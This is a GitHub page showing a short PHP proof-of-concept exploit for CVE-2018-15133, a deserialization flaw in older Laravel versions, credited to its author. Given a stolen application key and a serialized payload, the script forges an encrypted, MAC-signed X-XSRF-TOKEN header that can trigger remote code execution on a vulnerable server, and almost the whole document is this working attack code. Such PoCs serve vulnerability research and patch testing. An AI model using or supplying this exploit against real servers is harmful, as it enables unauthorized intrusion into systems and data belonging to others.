-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2018-15133.php
44 lines (35 loc) · 1.2 KB
/
cve-2018-15133.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env php
<?php
/**
*
* [CVE-2018-15133] Laravel Framework <= 5.6.29 / <= 5.5.40 / ~ https://github.com/kozmic/laravel-poc-CVE-2018-15133/
*
* Author:
* - Ståle Pettersen ~ https://github.com/kozmic ~ https://twitter.com/kozmic
*/
echo "PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic\n\n";
if ($argc < 3 )
{
echo "Usage: " . $argv[0] . " <base64encoded_APP_KEY> <base64encoded-payload>" . PHP_EOL;
exit();
}
$key = $argv[1];
$value = $argv[2];
$cipher = 'AES-256-CBC'; // or 'AES-128-CBC'
$iv = random_bytes(openssl_cipher_iv_length($cipher)); // instead of rolling a dice ;)
$value = \openssl_encrypt(
base64_decode($value), $cipher, base64_decode($key), 0, $iv
);
if ($value === false) {
exit("Could not encrypt the data.");
}
$iv = base64_encode($iv);
$mac = hash_hmac('sha256', $iv.$value, base64_decode($key));
$json = json_encode(compact('iv', 'value', 'mac'));
if (json_last_error() !== JSON_ERROR_NONE) {
echo "Could not json encode data." . PHP_EOL;
exit();
}
//$encodedPayload = urlencode(base64_encode($json));
$encodedPayload = base64_encode($json);
echo "HTTP header for POST request: \nX-XSRF-TOKEN: " . $encodedPayload . PHP_EOL;